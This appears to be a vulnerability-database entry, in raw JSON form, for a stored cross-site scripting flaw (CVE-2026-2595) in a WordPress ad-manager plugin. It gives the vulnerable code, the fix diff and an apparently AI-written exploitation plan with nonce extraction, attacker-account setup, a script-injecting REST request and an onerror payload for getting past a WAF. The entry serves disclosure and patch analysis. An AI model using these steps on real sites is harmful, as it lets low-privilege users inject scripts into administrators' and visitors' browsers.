[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fBEXnjdMrXMpkK7DP6q3xbTGhVBNo6CBTD_fS9lLa12s":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":33,"research_vulnerable_code":34,"research_fix_diff":35,"research_exploit_outline":36,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":40},"CVE-2026-2595","quads-ads-manager-for-google-adsense-authenticated-contributor-stored-cross-site-scripting-via-multiple-ad-metadata-para","Quads Ads Manager for Google AdSense \u003C= 2.0.98.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via Multiple Ad Metadata Parameters","The Quads Ads Manager for Google AdSense plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.0.98.1 due to insufficient input sanitization and output escaping of multiple ad metadata parameters. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","quick-adsense-reloaded",null,"\u003C=2.0.98.1","2.0.99","medium",5.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-27 23:01:01","2026-03-28 11:26:35",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F99051b12-5a24-4108-9ea4-81f37a1c1b35?source=api-prod",1,[22,23,24,25,26,27,28],"admin\u002Fassets\u002Fjs\u002Fdist\u002Fadminscript.js","admin\u002Fassets\u002Fjs\u002Fdist\u002Fstyle.css","admin\u002Fassets\u002Fjs\u002Ffonts\u002Ficomoon.svg","admin\u002Fincludes\u002Fcommon-functions.php","admin\u002Fincludes\u002Fmigration-service.php","admin\u002Fincludes\u002Fmobile-detect.php","admin\u002Fincludes\u002Frest-api-service.php","researched",false,3,"This plan outlines the research and exploitation strategy for CVE-2026-2595, a Stored Cross-Site Scripting (XSS) vulnerability in the Quads Ads Manager plugin.\n\n### 1. Vulnerability Summary\nThe Quads Ads Manager plugin (slug: `quick-adsense-reloaded`) is vulnerable to Stored XSS because it fails to sanitize and escape multiple ad-related metadata parameters. Specifically, the function `quads_sanitize_post_meta()` in `admin\u002Fincludes\u002Fcommon-functions.php` explicitly bypasses sanitization for several keys, using only `wp_unslash()`. When these parameters (such as the ad `code`) are later rendered on the frontend or in the admin dashboard, arbitrary scripts can be executed.\n\n### 2. Attack Vector Analysis\n*   **Vulnerable Endpoint:** WordPress REST API or AJAX handlers used to save `quads-ads` Custom Post Type (CPT) metadata.\n*   **Vulnerable Parameters:** `visibility_include`, `visibility_exclude`, `targeting_include`, `targeting_exclude`, `code`, `random_ads_list`, and `ads_list`.\n*   **Authentication Level:** Contributor or above. Contributors can typically create and edit their own posts of allowed types.\n*   **Preconditions:** The `quads-ads` CPT must be editable by the attacker.\n\n### 3. Code Flow\n1.  **Entry Point:** An authenticated user (Contributor+) sends a request to save or update a `quads-ads` post.\n2.  **Processing:** The plugin processes the post metadata. In `admin\u002Fincludes\u002Fcommon-functions.php`, the `quads_sanitize_post_meta` function is called:\n    ```php\n    function quads_sanitize_post_meta($key, $meta){\n        switch ($key) {\n          case 'visibility_include':\n          case 'visibility_exclude':\n          case 'targeting_include':\n          case 'targeting_exclude':\n          case 'code':           \u002F\u002F \u003C--- Vulnerable: Ad Code\n          case 'random_ads_list':\n          case 'ads_list':\n            $response = wp_unslash($meta); \u002F\u002F No sanitization\n            break;\n          default:\n            $response = sanitize_text_field(wp_unslash($meta));\n            break;\n        }\n        return $response;\n    }\n    ```\n3.  **Storage:** The unsanitized input is stored in the `postmeta` table. Additionally, `QUADS_Ad_Migration::quadsUpdateOldAd` (in `admin\u002Fincludes\u002Fmigration-service.php`) may sync this data into the global `quads_settings` option.\n4.  **Sink:** The stored `code` (intended for AdSense scripts) is retrieved and echoed on the frontend via a shortcode or automatic ad placement without escaping.\n\n### 4. Nonce Acquisition Strategy\nThe plugin uses a nonce named `quads_ajax_nonce` for AJAX and likely standard REST cookies for API calls. To extract the required nonce:\n\n1.  **Identify Trigger:** The `quads-ads` management UI enqueues `admin\u002Fassets\u002Fjs\u002Fdist\u002Fadminscript.js`.\n2.  **Setup Page:** Create a page with a Quads shortcode to ensure scripts are enqueued.\n    *   `wp post create --post_type=page --post_status=publish --post_content='[quads id=\"1\"]'`\n3.  **Extract:** Navigate to the page or the admin dashboard as the Contributor.\n4.  **Variable Name:** Based on standard naming conventions and the bundle structure, look for `quads_ad_obj` or `quads_vars`.\n    *   `browser_eval(\"window.quads_ad_obj?.ajax_nonce\")` (inferred)\n    *   Alternatively, check for the nonce in the admin head: `browser_eval(\"document.querySelector('#quads_ajax_nonce')?.value\")`\n\n### 5. Exploitation Strategy\nWe will attempt to update the metadata of a `quads-ads` post via the REST API or the plugin's custom save action.\n\n**Step 1: Identify an Ad ID**\n*   List existing ads: `wp post list --post_type=quads-ads`\n*   If none exist, create one: `wp post create --post_type=quads-ads --post_title=\"XSS Ad\" --post_status=publish`\n\n**Step 2: Update Metadata (The Exploit)**\nUse `http_request` to send a POST request to the update endpoint. We will target the `code` parameter.\n\n*   **URL:** `\u002Fwp-json\u002Fwp\u002Fv2\u002Fquads-ads\u002F{id}` (Standard REST) or `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action (if AJAX):** `quads_save_ad_settings` (inferred)\n*   **Payload:**\n    ```json\n    {\n      \"meta\": {\n        \"code\": \"\u003Cscript>alert('XSS_SUCCESS_CVE_2026_2595')\u003C\u002Fscript>\",\n        \"visibility_include\": \"all\"\n      }\n    }\n    ```\n*   **Headers:** `Content-Type: application\u002Fjson`, `X-WP-Nonce: [extracted_nonce]`\n\n**Step 3: Trigger Execution**\nVisit the frontend page where the ad is assigned or use a shortcode:\n*   `GET \u002F?p=[page_with_ad_id]`\n\n### 6. Test Data Setup\n1.  **User:** `wp user create attacker attacker@example.com --role=contributor --user_pass=password`\n2.  **Ad:** `wp post create --post_type=quads-ads --post_title=\"Vulnerable Ad\" --post_status=publish --post_author=[attacker_id]` (Note: Ensure the post ID is captured, e.g., `123`).\n3.  **Display Page:** `wp post create --post_type=page --post_title=\"Ad Display\" --post_content='[quads id=\"123\"]' --post_status=publish`\n\n### 7. Expected Results\n*   The `http_request` should return a `200 OK`.\n*   Navigating to the display page in the browser should trigger a JavaScript alert with the string `XSS_SUCCESS_CVE_2026_2595`.\n*   The raw source of the page should contain the unescaped `\u003Cscript>` tag within the ad container.\n\n### 8. Verification Steps (Post-Exploit)\n*   **Database Check:** `wp post meta get [ad_id] code`\n    *   Expected: `\u003Cscript>alert('XSS_SUCCESS_CVE_2026_2595')\u003C\u002Fscript>`\n*   **Global Settings Check:** `wp option get quads_settings`\n    *   Check if the payload has propagated to the serialized settings array.\n\n### 9. Alternative Approaches\nIf the standard REST API is restricted:\n1.  **AJAX Path:** Look for the `quads_save_ad` action in `admin\u002Fassets\u002Fjs\u002Fdist\u002Fadminscript.js`.\n2.  **Migration Sink:** If direct editing of `quads-ads` is blocked for Contributors, check if the \"Migration\" settings in the dashboard (if accessible) allow importing raw JSON data containing the payload.\n3.  **Parameter Variation:** If `code` is blocked by a WAF, use `visibility_include` with a payload like `\">\u003Cimg src=x onerror=alert(1)>`.","The Quads Ads Manager plugin is vulnerable to Stored Cross-Site Scripting (XSS) via multiple ad metadata parameters in versions up to 2.0.98.1. Authenticated attackers with Contributor-level access or higher can inject arbitrary JavaScript into ad settings, which executes in the context of any user viewing the ad on the frontend or admin dashboard.","\u002F\u002F admin\u002Fincludes\u002Fcommon-functions.php:5\nfunction quads_sanitize_post_meta($key, $meta){\n\n    $response = null;\n\n    switch ($key) {\n\n      case 'visibility_include':\n      case 'visibility_exclude':\n\t\t\t$response = wp_unslash($meta);         \n        break;\n\n\t\tcase 'targeting_include':\n\t\tcase 'targeting_exclude':\n        $response = wp_unslash($meta);          \n\t\tbreak;\n\t\tcase 'code':\n\t\t\t$response = wp_unslash($meta);\n\t\tbreak;\n    case 'random_ads_list':\n\t\t\t$response = wp_unslash($meta); \n\t\tbreak; \n\t\tcase 'ads_list':\n\t\t\t$response = wp_unslash($meta);          \n\t\tbreak;\n      default:\n        $response = sanitize_text_field(wp_unslash($meta));\n        break;\n    }\n\n    return $response;\n    \n  }","--- admin\u002Fincludes\u002Fcommon-functions.php\n+++ admin\u002Fincludes\u002Fcommon-functions.php\n@@ -10,19 +10,19 @@\n \n       case 'visibility_include':\n       case 'visibility_exclude':\n-\t\t\t$response = wp_unslash($meta);         \n+            $response = map_deep(wp_unslash($meta), 'sanitize_text_field');\n         break;\n \n \t\tcase 'targeting_include':\n \t\tcase 'targeting_exclude':\n-        $response = wp_unslash($meta);          \n+        $response = map_deep(wp_unslash($meta), 'sanitize_text_field');\n \t\tbreak;\n \t\tcase 'code':\n-\t\t\t$response = wp_unslash($meta);\n+\t\t\t$response = wp_kses_post(wp_unslash($meta));\n \t\tbreak;\n     case 'random_ads_list':\n-\t\t\t$response = wp_unslash($meta); \n+\t\t\t$response = map_deep(wp_unslash($meta), 'sanitize_text_field');\n \t\tbreak; \n \t\tcase 'ads_list':\n-\t\t\t$response = wp_unslash($meta);          \n+\t\t\t$response = map_deep(wp_unslash($meta), 'sanitize_text_field');\n \t\tbreak;","The vulnerability is exploited by an authenticated attacker (minimum Contributor role) who can modify or create 'quads-ads' custom post types. The attacker sends a request to save ad metadata via the WordPress REST API or an AJAX handler. By including a malicious payload in parameters like 'code', 'visibility_include', or 'ads_list', the attacker bypasses the plugin's insufficient sanitization logic in `quads_sanitize_post_meta()`. The payload is stored in the database and subsequently executed when a site administrator or visitor views the injected ad (e.g., via the [quads] shortcode or automatic placement) because the plugin fails to escape the output.","gemini-3-flash-preview","2026-04-17 22:30:15","2026-04-17 22:31:02",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","2.0.98.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fquick-adsense-reloaded\u002Ftags\u002F2.0.98.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquick-adsense-reloaded.2.0.98.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fquick-adsense-reloaded\u002Ftags\u002F2.0.99","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquick-adsense-reloaded.2.0.99.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fquick-adsense-reloaded\u002Ftags"]